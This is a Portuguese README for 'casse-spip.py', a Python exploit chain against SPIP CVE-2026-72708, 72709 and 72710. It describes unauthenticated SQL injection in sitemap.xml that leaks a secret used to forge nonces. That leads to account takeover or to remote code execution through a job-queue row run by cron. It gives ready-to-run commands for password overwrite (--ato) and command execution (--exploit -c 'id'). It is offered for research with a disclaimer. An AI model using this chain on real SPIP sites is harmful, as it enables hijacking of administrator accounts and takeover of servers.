
Cadeia de exploits em Python para as CVEs 2026-72708/72709/72710 do SPIP, encadeando injeção SQL não autenticada até tomada de conta e execução remota de código.
Exploit para CVE-2026-72708, CVE-2026-72709 e CVE-2026-72710 descoberto por Franck Chevalier (Wayko)
Para uma análise técnica completa e aprofundada, leia o artigo completo no blog da Lexfo.
Este repositório é fornecido apenas para fins de pesquisa e segurança defensiva. O autor não assume qualquer responsabilidade pelo uso indevido destas informações.
O ponto de entrada é uma injeção SQL na página pública sitemap.xml para vazar alea_ephemere.
Com esse segredo, nonces válidos podem ser forjados para ações anônimas.
A partir daí, duas ações levam ao RCE:
action=editer_auteur tomada de conta, depois RCE a partir da área privada.action=editer_objet mass assignment, para escrever uma linha na fila spip_jobs, depois executá-la através de action=cron.python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"
Antes de sobrescrever, --ato extrai o login do alvo e o hash pass atual
(através da SQLi) para que você possa restaurá-lo depois com --restore-hash:
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"
O arquivo será escrito em IMG/casse-spip_<token>.html.